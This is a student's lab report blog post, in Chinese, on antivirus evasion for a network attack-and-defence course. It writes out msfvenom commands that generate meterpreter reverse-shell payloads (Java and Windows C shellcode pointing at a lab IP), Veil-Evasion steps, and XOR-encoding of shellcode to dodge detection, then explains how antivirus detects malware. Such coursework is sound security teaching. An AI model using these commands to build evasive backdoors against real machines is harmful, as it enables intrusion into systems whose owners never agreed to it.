20155304 网络攻防技术 实验三 免杀原理与实践

20155304 网络攻防技术 实验三 免杀原理与实践

实验内容

1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

使用上次实验产生的后门文件,放入老师提供的网址进行扫描,有48%的杀软报告病毒。
image

使用msf编码器

利用msfvenom -p java/meterpreter/reverse_tcp lhost=(kali ip) lport=端口号 x> 5304_backjar.jar,生成jar文件,进行检测。

image

image

使用Veil-Evasion重新编写源代码

在Kali中安装veil,sudo apt-get install veil

在Kali的终端中启动Veil-Evasion
命令行中输入veil,后在veil中输入命令use evasion

image

依次输入如下命令生成你的可执行文件:

use python/meterpreter/rev_tcp.py(设置payload)

set LHOST Kali的IP(设置反弹连接IP)

set LPORT 端口号(设置反弹端口)

generate

可执行文件名

image

image

检测exe文件:

image

利用shellcode编程实现免杀

使用命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=443 -f c生成C语言的shellcode。

image

将其手动复制到code::blocks中运行,生成exe可执行文件。

进行免杀测试:

image

对shellcode进行更改

对shellcode进行异或,每一位数异或0x47

检测:

image

2.1.基础问题回答

(1)杀软是如何检测出恶意代码的?

基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序

(2)免杀是做什么?

对恶意软件进行处理,使其不被杀毒软件所检测。

(3)免杀的基本方法有哪些?

用MSF编码器进行一次或多次编码

veil-Evasion

shellcode

加壳

2.2.实践总结与体会

本次实验本身并不难,但虚拟机本身总是出现问题。在下次实验之前要重装虚拟机,以避免再出现束手无策的状况。在此次试验中,我了解到了病毒与杀软的大致工作原理,了解了病毒是如何进一步加工以避免被杀软检测,也让我深刻的认识到了病毒的危险与危害,应定期对电脑进行检查以查杀病毒。

posted @ 2018-04-11 15:37  田宜楠20155304  阅读(225)  评论(0编辑  收藏  举报